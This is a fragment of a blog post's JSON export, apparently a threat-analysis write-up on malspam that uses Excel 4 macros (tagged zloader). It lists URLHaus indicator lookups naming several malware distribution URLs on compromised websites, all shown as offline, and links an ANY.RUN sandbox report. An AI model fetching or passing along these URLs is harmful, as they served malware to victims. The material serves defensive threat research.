\n[!] URLHaus info TYPE: unknown FIRST_SEEN: 2018-05-15 10:08:45 LAST_SEEN: 2018-07-11 14:59:33 URL_COUNT: 5
\n[!] URLHaus STATUS: offline URL: http:\/\/motoboutique.mx\/VirginMedia\/319472649399\/
\n[!] URLHaus STATUS: offline URL: http:\/\/victoryoutreachvallejo.com\/wp-content\/plugins\/regenerate-thumbnails\/includes\/1
\n[!] URLHaus STATUS: offline URL: http:\/\/victoryoutreachvallejo.com\/wp-content\/plugins\/regenerate-thumbnails\/includes\/2
\n[!] URLHaus STATUS: offline URL: http:\/\/victoryoutreachvallejo.com\/wp-content\/plugins\/regenerate-thumbnails\/includes\/3
\n[!] URLHaus STATUS: offline URL: http:\/\/gmshipsupply.com\/Invoices-attached\/
\n[!] Sample on ANY.RUN URL: http:\/\/any.run\/report\/7eb70257593da06f682a3ddda54a9d260d4fc514f645237f5ca74b08f8da61a6<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"
Summary ======== This is a late posting since I was originally playing with the malspam back on the 17th. In this case I was looking at some emails that were caught by the mail filters. Looking at the attachment in the email a little closer I noticed that this was one that I had not seen before but had read about on several different occasions – an Excel 4 macro. The interesting thing about this attack vector is the fact that it doesn’t rely on an embedded VB macro in the Excel spreadsheet per se, but uses the native built-in…<\/p>\n
 Continue reading<\/span><\/i><\/a> <\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[10,4],"tags":[40],"class_list":["post-1382","post","type-post","status-publish","format-standard","hentry","category-code","category-packet-analysis","tag-zloader"],"_links":{"self":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/1382","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1382"}],"version-history":[{"count":6,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/1382\/revisions"}],"predecessor-version":[{"id":1487,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/1382\/revisions\/1487"}],"wp:attachment":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1382"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1382"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1382"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}